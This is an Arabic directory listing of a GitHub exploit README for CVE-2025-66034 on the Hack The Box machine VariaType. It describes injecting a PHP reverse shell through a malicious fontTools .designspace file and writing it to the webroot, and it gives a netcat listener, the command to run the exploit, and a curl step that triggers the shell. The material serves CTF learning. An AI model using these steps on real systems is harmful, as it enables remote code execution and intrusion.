Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-66034-htb-ctf | Kitploit
أدوات/GitHubGitHub/jwsly12/cve-2025-66034-htb-ctf
توليد الحمولةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubjwsly12/cve-2025-66034-htb-ctf

CVE-2025-66034-htb-ctf

عرض المستودع
1منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-66034-htb-ctf

استغلال مولّد الخطوط المتغيرة VariaType

يحتوي هذا المستودع على استغلال متخصص لجهاز VariaType على منصة Hack The Box. يستغل هذا الاستغلال ثغرة في كيفية تعامل مكتبة fontTools أو تطبيق الويب مع ملفات .designspace الخاصة بـ XML واستيفاء البيانات الوصفية لتحقيق تنفيذ الأوامر عن بُعد (RCE).

📝 الوصف

تقع الثغرة في عملية توليد الخطوط. من خلال إنشاء ملف designspace خبيث، يمكننا حقن حمولة قشرة عكسية بلغة PHP في البيانات الوصفية للخط (تحديدًا في حقل <labelname>). عندما يعالج الخادم هذه الملفات لتوليد خط متغير، فإنه يكتب المخرجات إلى مسار يحدده المستخدم، مما يسمح لنا بوضع قشرة .php في الجذر العام للويب (webroot).

🛠️ الميزات

  • توليد الخطوط تلقائيًا: إنشاء خطوط أساسية صالحة source-light.ttf و source-regular.ttf باستخدام fontTools.
  • حقن XML: إنشاء ملف designspace خبيث يحتوي على حمولة PHP مغلّفة بـ CDATA.
  • اجتياز المسار/كتابة ملفات عشوائية: محاولة حفظ "الخط" الناتج كملف .php في الدليل العام.
  • العشوائية: توليد أسماء قشرة فريدة لتجنب التعارضات.

🚀 المتطلبات

يجب أن يكون لديك Python 3 مثبتًا بالإضافة إلى المكتبات التالية:

root@kitploit:~
pip install fontTools requests

💻 الاستخدام

1. ابدأ المستمع الخاص بك

على جهازك المحلي (أو Pwnbox)، ابدأ مستمع Netcat:

root@kitploit:~
nc -lvnp 4444

2. شغّل الاستغلال

نفّذ السكربت عن طريق توفير عنوان IP الخاص بشبكة VPN الخاصة بـ HTB ومنفذ المستمع:

root@kitploit:~
python3 exploit.py --ip <YOUR_IP> --port 4444

3. فعّل القشرة

إذا أرجع الرفع استجابة 200 OK (أو حتى 500 في بعض الأحيان إذا تمت المعالجة قبل حدوث الخطأ)، فسيوفر السكربت اسم الملف. يمكنك الوصول إليه عبر curl أو متصفحك:

root@kitploit:~
curl http://portal.variatype.htb/shell_xxxxxx.php

⚙️ الوسائط

⚠️ إخلاء المسؤولية

هذا السكربت مخصص للأغراض التعليمية واختبار الاختراق المصرح به فقط. الوصول إلى الأهداف أو مهاجمتها دون إذن مسبق يعد أمرًا غير قانوني.


كيفية استخدام ملف README هذا:

  1. احفظ المحتوى أعلاه باسم README.md في نفس المجلد الذي يحتوي على سكربتك.
  2. تأكد من أن سكربتك مسمى exploit.py أو قم بتحديث اسم الملف في الأوامر أعلاه.
تنزيل الأداة
الوسيطالوصفالافتراضي
--ipعنوان IP الخاص بالمستمع (VPN)مطلوب
--portمنفذ المستمع الخاص بكمطلوب
--pathالمسار المستهدف للقشرة/var/www/portal.variatype.htb/public
--urlنقطة نهاية الرفعhttp://variatype.htb/tools/.../process